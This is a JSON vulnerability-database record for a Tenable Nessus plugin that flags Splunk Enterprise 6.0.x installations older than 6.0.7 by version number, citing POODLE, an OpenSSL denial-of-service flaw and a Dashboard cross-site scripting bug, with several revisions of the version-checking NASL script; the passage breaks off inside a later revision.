{"id": "SPLUNK_607.NASL", "bulletinFamily": "scanner", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "description": "According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "published": "2014-12-04T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "reporter": "Tenable", "references": ["https://www.splunk.com/view/SP-CAAANST", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "type": "nessus", "lastseen": "2019-01-16T20:20:22", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:splunk:splunk"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 6, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "f9d0405d369696e0867678de0d6b47bf470367711aabf2337b61aaa867f5ed42", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "bf85ac661e90f76efc3e3b625164c738", "key": "cvss"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "dfc7149444808a0f1dc6e0cd2852dab6", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "8f041c0fcda52146c962a2af67d7c713", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "f66544bdb93645ad0d9c3861d28d686d", "key": "sourceData"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2018-11-17T03:10:04", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.splunk.com/view/SP-CAAANST", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 45}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-17T03:10:04"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 1, "enchantments": {}, "hash": "01109816c3e81f11cb8ea5bf0e0e83b974b1674032b89918135b9d194859f619", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "bf85ac661e90f76efc3e3b625164c738", "key": "cvss"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8c669a229bb7e8ad8fcc835ab88c475a", "key": "modified"}, {"hash": "1c7c27e5a9a4e7d2dbe4b31afa5c224f", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "3f4e1c2fc418f5abbca00df2677c178c", "key": "references"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2016-09-26T17:25:49", "modified": "2016-05-12T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:55:05 $\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_osvdb_id(113251, 113374);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:TF/RC:UR\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 19}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:49"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:splunk:splunk"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "7eb6a3edb5fe208ee93b545aa3f5563d53484c335f516c7c4bbffea0a1067ad5", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "bf85ac661e90f76efc3e3b625164c738", "key": "cvss"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8c669a229bb7e8ad8fcc835ab88c475a", "key": "modified"}, {"hash": "8f041c0fcda52146c962a2af67d7c713", "key": "cpe"}, {"hash": "1c7c27e5a9a4e7d2dbe4b31afa5c224f", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "3f4e1c2fc418f5abbca00df2677c178c", "key": "references"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2017-10-29T13:42:32", "modified": "2016-05-12T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:55:05 $\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_osvdb_id(113251, 113374);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:TF/RC:UR\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 36}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:42:32"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:splunk:splunk"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 5, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "f0d18187296d718314f68012f5ef0ffcb24d42dce7471cb9e20c8d626ccbda73", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "3b33040e1ee70c0673ab567f99a67d3f", "key": "modified"}, {"hash": "bf85ac661e90f76efc3e3b625164c738", "key": "cvss"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8f041c0fcda52146c962a2af67d7c713", "key": "cpe"}, {"hash": "96b871079f24288bf32a59eb920d6ad4", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "3f4e1c2fc418f5abbca00df2677c178c", "key": "references"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2018-09-02T00:00:11", "modified": "2018-07-30T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/30 15:31:31\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A 